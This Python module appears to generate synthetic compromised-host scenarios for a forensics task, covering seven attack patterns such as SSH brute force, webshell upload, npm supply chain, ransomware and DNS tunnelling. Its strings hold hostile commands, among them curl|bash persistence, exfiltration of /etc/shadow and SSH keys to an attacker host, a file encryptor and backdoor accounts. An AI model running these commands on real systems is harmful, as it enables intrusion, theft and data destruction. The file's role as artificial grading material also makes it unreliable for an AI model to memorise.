""" Attack pattern templates used by the scenario generator. Each pattern is a callable `build(ctx) -> PatternArtifacts` where `ctx` is a SimpleNamespace with fields: rng, user, ip, host, ts_base, backdoor_sha256, backdoor_bytes, backdoor_path. The callable returns a dict describing: - auth_log_lines: list[str] appended to /var/log/auth.log - bash_history: str contents of the compromised user's .bash_history - modified_files: dict[path, content] — system files changed by the attacker - modified_paths: list[str] — the subset the grader expects (subset of modified_files) - timeline: list[dict(phase, detail)] — 5-phase kill chain for hard tier - pattern_tag: short slug used in task_id All timestamps are rendered relative to ctx.ts_base (a datetime) so every log looks self-consistent. Nothing here touches global random state. """ from datetime import timedelta def _fmt_ts(ts): return ts.strftime("%b %d %H:%M:%S") # --------------------------------------------------------------------------- # Pattern 1 — SSH brute force -> wget payload -> cron persistence # --------------------------------------------------------------------------- def ssh_brute(ctx): user, ip, host = ctx.user, ctx.ip, ctx.host ts = ctx.ts_base auth = [ f"{_fmt_ts(ts)} {host} sshd[1811]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2", f"{_fmt_ts(ts + timedelta(seconds=3))} {host} sshd[1813]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2", f"{_fmt_ts(ts + timedelta(seconds=7))} {host} sshd[1815]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2", f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2", f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: pam_unix(sshd:session): session opened for user {user} by (uid=0)", f"{_fmt_ts(ts + timedelta(minutes=1))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}", f"{_fmt_ts(ts + timedelta(minutes=1, seconds=5))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /etc/cron.d/{ctx.short}-sync", ] bash = ( f"cd /tmp\n" f"wget -q http://{ip}/payload/.{ctx.short}\n" f"chmod +x .{ctx.short}\n" f"sudo cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}\n" f"echo '* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1' | sudo tee -a /etc/cron.d/{ctx.short}-sync\n" f"history -c\n" f"exit\n" ) cron_path = f"/etc/cron.d/{ctx.short}-sync" cron_content = ( f"# Managed by deploy\n" f"0 3 * * * root /usr/local/sbin/logrotate.sh\n" f"* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1\n" ) passwd_content = ( f"root:x:0:0:root:/root:/bin/bash\n" f"{user}:x:1000:1000:{user.title()},,,:/home/{user}:/bin/bash\n" f"sysd:x:0:0:System Daemon,,,:/var/lib/sysd:/bin/bash\n" # attacker-added backdoor acct ) modified_files = { "/etc/passwd": passwd_content, cron_path: cron_content, ctx.backdoor_path: ctx.backdoor_bytes, } timeline = [ {"phase": "login", "detail": f"ssh brute -> accepted from {ip}"}, {"phase": "recon", "detail": "whoami; id; uname -a"}, {"phase": "privesc", "detail": "sudo cp payload to /usr/local/bin"}, {"phase": "persistence", "detail": f"cron {cron_path} runs backdoor every minute"}, {"phase": "exfil", "detail": f"beacon POST to {ip}/beacon"}, ] return dict( pattern_tag="ssh_brute", auth_log_lines=auth, bash_history=bash, modified_files=modified_files, modified_paths=["/etc/passwd", cron_path, ctx.backdoor_path], timeline=timeline, ) # --------------------------------------------------------------------------- # Pattern 2 — stolen SSH key -> authorized_keys backdoor -> bashrc persistence # --------------------------------------------------------------------------- def ssh_key_theft(ctx): user, ip, host = ctx.user, ctx.ip, ctx.host ts = ctx.ts_base fp = f"SHA256:{''.join(ctx.rng.choices('abcdef0123456789', k=16))}" auth = [ f"{_fmt_ts(ts)} {host} sshd[522]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2: RSA {fp}", f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[522]: pam_unix(sshd:session): session opened for user {user} by (uid=0)", f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.ssh/authorized_keys", f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.bashrc", ] bash = ( f"cat ~/.ssh/authorized_keys\n" f"echo 'ssh-rsa AAAAB3NzaC1yc2E... attacker@stolen' >> ~/.ssh/authorized_keys\n" f"echo 'curl -s http://{ip}/tick | bash >/dev/null 2>&1 &' >> ~/.bashrc\n" f"chmod 600 ~/.ssh/authorized_keys\n" f"history -c\n" ) authorized_keys = ( f"ssh-rsa AAAAB3NzaC1yc2EA...legit-original-key {user}@laptop\n" f"ssh-rsa AAAAB3NzaC1yc2EA...attacker-backdoor attacker@stolen\n" ) bashrc = ( f"# ~/.bashrc\n" f"alias ll='ls -la'\n" f"export PATH=$PATH:/usr/local/bin\n" f"curl -s http://{ip}/tick | bash >/dev/null 2>&1 &\n" ) modified_files = { f"/home/{user}/.ssh/authorized_keys": authorized_keys, f"/home/{user}/.bashrc": bashrc, ctx.backdoor_path: ctx.backdoor_bytes, } timeline = [ {"phase": "login", "detail": f"pubkey accepted from {ip} (stolen key)"}, {"phase": "recon", "detail": "cat authorized_keys; env"}, {"phase": "privesc", "detail": "already had sudo"}, {"phase": "persistence", "detail": "append attacker key to authorized_keys and bashrc"}, {"phase": "exfil", "detail": f"reverse shell to {ip} on login"}, ] return dict( pattern_tag="ssh_key_theft", auth_log_lines=auth, bash_history=bash, modified_files=modified_files, modified_paths=[ f"/home/{user}/.ssh/authorized_keys", f"/home/{user}/.bashrc", ctx.backdoor_path, ], timeline=timeline, ) # --------------------------------------------------------------------------- # Pattern 3 — webshell upload -> php drop -> curl exfil # --------------------------------------------------------------------------- def webshell(ctx): user, ip, host = ctx.user, ctx.ip, ctx.host ts = ctx.ts_base auth = [ f"{_fmt_ts(ts)} {host} sshd[3001]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2", f"{_fmt_ts(ts + timedelta(minutes=4))} {host} sudo: {user} : TTY=pts/2 ; PWD=/var/www/html ; USER=www-data ; COMMAND=/usr/bin/vim shell.php", ] bash = ( f"curl -sO http://{ip}/shell.php\n" f"sudo mv shell.php /var/www/html/shell.php\n" f"sudo chown www-data:www-data /var/www/html/shell.php\n" f"curl -s http://localhost/shell.php?cmd=id\n" f"curl -X POST -F file=@/etc/shadow http://{ip}/drop\n" f"history -c\n" ) webshell_content = ( b"\n" ) modified_files = { "/var/www/html/shell.php": webshell_content, ctx.backdoor_path: ctx.backdoor_bytes, } # ensure unique paths if ctx.backdoor_path == "/var/www/html/shell.php": # extremely unlikely but guard anyway modified_files[ctx.backdoor_path] = ctx.backdoor_bytes timeline = [ {"phase": "login", "detail": f"ssh from {ip}"}, {"phase": "recon", "detail": "ls /var/www/html; id"}, {"phase": "privesc", "detail": "sudo mv shell.php; chown www-data"}, {"phase": "persistence", "detail": "php webshell at /var/www/html/shell.php"}, {"phase": "exfil", "detail": f"curl POST /etc/shadow to {ip}/drop"}, ] return dict( pattern_tag="webshell", auth_log_lines=auth, bash_history=bash, modified_files=modified_files, modified_paths=["/var/www/html/shell.php", ctx.backdoor_path], timeline=timeline, ) # --------------------------------------------------------------------------- # Pattern 4 — supply-chain compromised package -> /usr/lib drop # --------------------------------------------------------------------------- def supply_chain(ctx): user, ip, host = ctx.user, ctx.ip, ctx.host ts = ctx.ts_base pkg = ctx.rng.choice(["leftpad-js", "event-stream", "colors-fix", "pytype-helper"]) auth = [ f"{_fmt_ts(ts)} {host} sshd[901]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2", f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/npm install -g {pkg}", ] bash = ( f"npm view {pkg}\n" f"sudo npm install -g {pkg}\n" f"node -e 'require(\"{pkg}\")'\n" f"ls /usr/lib/node_modules/{pkg}/\n" f"history -c\n" ) postinstall = ( f"// postinstall.js -- dropped by malicious {pkg}\n" "const { exec } = require('child_process');\n" f"exec('curl -s http://{ip}/b -o /tmp/.{ctx.short} && chmod +x /tmp/.{ctx.short} && /tmp/.{ctx.short} &');\n" ) modified_files = { f"/usr/lib/node_modules/{pkg}/postinstall.js": postinstall, ctx.backdoor_path: ctx.backdoor_bytes, } timeline = [ {"phase": "login", "detail": f"pubkey from {ip}"}, {"phase": "recon", "detail": f"npm view {pkg}"}, {"phase": "privesc", "detail": f"sudo npm install -g {pkg} runs postinstall as root"}, {"phase": "persistence", "detail": f"{pkg} postinstall drops /tmp/.{ctx.short}"}, {"phase": "exfil", "detail": f"backdoor beacons to {ip}"}, ] return dict( pattern_tag="supply_chain", auth_log_lines=auth, bash_history=bash, modified_files=modified_files, modified_paths=[f"/usr/lib/node_modules/{pkg}/postinstall.js", ctx.backdoor_path], timeline=timeline, ) # --------------------------------------------------------------------------- # Pattern 5 — insider threat: legit user exfiltrates db from internal network # --------------------------------------------------------------------------- def insider(ctx): user, ip, host = ctx.user, ctx.ip, ctx.host ts = ctx.ts_base # insider uses internal network, not public IP, so override auth = [ f"{_fmt_ts(ts)} {host} sshd[415]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2", f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/mysqldump --all-databases", f"{_fmt_ts(ts + timedelta(minutes=5))} {host} sudo: {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/rsync -av /var/lib/mysql/dump.sql /tmp/.staging", ] bash = ( f"sudo mysqldump --all-databases > /var/lib/mysql/dump.sql\n" f"sudo rsync -av /var/lib/mysql/dump.sql /tmp/.staging/\n" f"scp /tmp/.staging/dump.sql {user}@laptop.internal:/tmp/\n" f"rm /tmp/.staging/dump.sql\n" f"history -c\n" ) dump_content = b"-- MySQL dump (exfiltrated)\nCREATE TABLE users (id INT, email VARCHAR(255));\n" staging_content = b"-- staged copy\n" + dump_content modified_files = { "/var/lib/mysql/dump.sql": dump_content, "/tmp/.staging/dump.sql": staging_content, ctx.backdoor_path: ctx.backdoor_bytes, } timeline = [ {"phase": "login", "detail": f"pubkey from internal {ip} (legit creds abused)"}, {"phase": "recon", "detail": "ls /var/lib/mysql"}, {"phase": "privesc", "detail": "user already had sudo"}, {"phase": "persistence", "detail": "staging dir /tmp/.staging persists data"}, {"phase": "exfil", "detail": "scp dump.sql to laptop.internal"}, ] return dict( pattern_tag="insider", auth_log_lines=auth, bash_history=bash, modified_files=modified_files, modified_paths=[ "/var/lib/mysql/dump.sql", "/tmp/.staging/dump.sql", ctx.backdoor_path, ], timeline=timeline, ) # --------------------------------------------------------------------------- # Pattern 6 — ransomware: encrypt files + drop ransom note + cron persistence # --------------------------------------------------------------------------- def ransomware(ctx): user, ip, host = ctx.user, ctx.ip, ctx.host ts = ctx.ts_base auth = [ f"{_fmt_ts(ts)} {host} sshd[2201]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2", f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[2201]: pam_unix(sshd:session): session opened for user {user} by (uid=0)", f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/bash /tmp/.{ctx.short}_enc.sh", f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee /etc/cron.d/{ctx.short}-check", ] bash = ( f"cd /tmp\n" f"curl -sO http://{ip}/enc/{ctx.short}_enc.sh\n" f"chmod +x .{ctx.short}_enc.sh\n" f"sudo bash /tmp/.{ctx.short}_enc.sh\n" f"echo '*/10 * * * * root /tmp/.{ctx.short}_enc.sh >/dev/null 2>&1' | sudo tee /etc/cron.d/{ctx.short}-check\n" f"history -c\n" ) ransom_note = ( f"=== YOUR FILES HAVE BEEN ENCRYPTED ===\n" f"All .doc, .pdf, .xls files on this host have been encrypted.\n" f"Send 0.5 BTC to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\n" f"Contact: recovery-{ctx.short}@protonmail.com\n" f"DO NOT attempt to decrypt without the key.\n" ) enc_script = ( f"#!/bin/bash\n" f"# {ctx.short} encryptor\n" f"find /home -name '*.doc' -o -name '*.pdf' -o -name '*.xls' 2>/dev/null | " f"while read f; do openssl enc -aes-256-cbc -salt -in \"$f\" -out \"$f.enc\" -pass pass:{ctx.short}; done\n" f"echo 'encryption complete' | curl -s -X POST -d @- http://{ip}/status/{ctx.short}\n" ).encode() cron_content = f"*/10 * * * * root /tmp/.{ctx.short}_enc.sh >/dev/null 2>&1\n" modified_files = { f"/tmp/.{ctx.short}_enc.sh": enc_script, "/home/RANSOM_NOTE.txt": ransom_note, f"/etc/cron.d/{ctx.short}-check": cron_content, ctx.backdoor_path: ctx.backdoor_bytes, } timeline = [ {"phase": "login", "detail": f"ssh from {ip}"}, {"phase": "recon", "detail": "find /home -name *.doc"}, {"phase": "privesc", "detail": "sudo bash encryption script"}, {"phase": "persistence", "detail": f"cron /etc/cron.d/{ctx.short}-check re-encrypts on schedule"}, {"phase": "exfil", "detail": f"encryption status beacon to {ip}"}, ] return dict( pattern_tag="ransomware", auth_log_lines=auth, bash_history=bash, modified_files=modified_files, modified_paths=[ f"/tmp/.{ctx.short}_enc.sh", "/home/RANSOM_NOTE.txt", f"/etc/cron.d/{ctx.short}-check", ctx.backdoor_path, ], timeline=timeline, ) # --------------------------------------------------------------------------- # Pattern 7 — DNS tunnel: exfiltrate data via DNS TXT queries # --------------------------------------------------------------------------- def dns_tunnel(ctx): user, ip, host = ctx.user, ctx.ip, ctx.host ts = ctx.ts_base tunnel_domain = f"{ctx.short}.exfil.example.com" auth = [ f"{_fmt_ts(ts)} {host} sshd[1101]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2", f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[1101]: pam_unix(sshd:session): session opened for user {user} by (uid=0)", f"{_fmt_ts(ts + timedelta(minutes=1))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/apt install dnsutils", f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/bash /tmp/.{ctx.short}_dns.sh", ] bash = ( f"sudo apt install -y dnsutils\n" f"cat /etc/shadow | base64 | fold -w 63 | while read chunk; do dig TXT $chunk.{tunnel_domain} +short; done\n" f"cat /etc/passwd | base64 | fold -w 63 | while read chunk; do dig TXT $chunk.{tunnel_domain} +short; done\n" f"echo '*/5 * * * * root /tmp/.{ctx.short}_dns.sh' | sudo tee /etc/cron.d/{ctx.short}-dns\n" f"history -c\n" ) dns_script = ( f"#!/bin/bash\n" f"# DNS tunnel exfil agent — {ctx.short}\n" f"for f in /etc/shadow /etc/passwd /home/*/.ssh/id_rsa; do\n" f" [ -f \"$f\" ] && cat \"$f\" | base64 | fold -w 63 | " f"while read c; do dig TXT \"$c.{tunnel_domain}\" +short 2>/dev/null; done\n" f"done\n" ).encode() cron_content = f"*/5 * * * * root /tmp/.{ctx.short}_dns.sh >/dev/null 2>&1\n" modified_files = { f"/tmp/.{ctx.short}_dns.sh": dns_script, f"/etc/cron.d/{ctx.short}-dns": cron_content, ctx.backdoor_path: ctx.backdoor_bytes, } timeline = [ {"phase": "login", "detail": f"ssh from {ip}"}, {"phase": "recon", "detail": "cat /etc/shadow; cat /etc/passwd"}, {"phase": "privesc", "detail": "sudo apt install dnsutils"}, {"phase": "persistence", "detail": f"cron /etc/cron.d/{ctx.short}-dns runs every 5 min"}, {"phase": "exfil", "detail": f"base64 chunks via DNS TXT to {tunnel_domain}"}, ] return dict( pattern_tag="dns_tunnel", auth_log_lines=auth, bash_history=bash, modified_files=modified_files, modified_paths=[ f"/tmp/.{ctx.short}_dns.sh", f"/etc/cron.d/{ctx.short}-dns", ctx.backdoor_path, ], timeline=timeline, ) PATTERNS = { "ssh_brute": ssh_brute, "ssh_key_theft": ssh_key_theft, "webshell": webshell, "supply_chain": supply_chain, "insider": insider, "ransomware": ransomware, "dns_tunnel": dns_tunnel, }